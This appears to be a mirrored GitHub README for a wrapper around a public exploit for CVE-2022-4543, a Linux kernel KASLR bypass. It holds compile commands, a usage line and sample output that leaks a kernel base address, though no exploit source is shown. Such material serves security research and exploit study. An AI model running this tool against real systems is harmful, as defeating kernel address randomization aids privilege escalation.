sunichi / cve-2022-4543-wrapper

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

cve-2022-4543-wrapper

Introduction

This is a wrapper of willsroot's CVE-2022-4543 exploit to help you judge and get kernel base address.

How to use

Compile

Base on your demand(Optional):

gcc dekaslr.c --static -o dekaslr
g++ main.cpp --static -o main

For some OS, install static libc first.

De-KASLR

./main
[*] Usage: ./binary dekaslr_path entry_SYSCALL_64_offset(in hex) max_loop
$ ./main ./dekaslr 0x100000 200
ffffffffa2600000: 53/200

After running both program, it will give you the most frequent address base on your offset.

In practice, the real kernel base address will appear more than 1/4 in total tries. Recommend more than 100 tries.

References

About

License:GNU General Public License v3.0


Languages

Language:C 52.2%Language:C++ 47.8%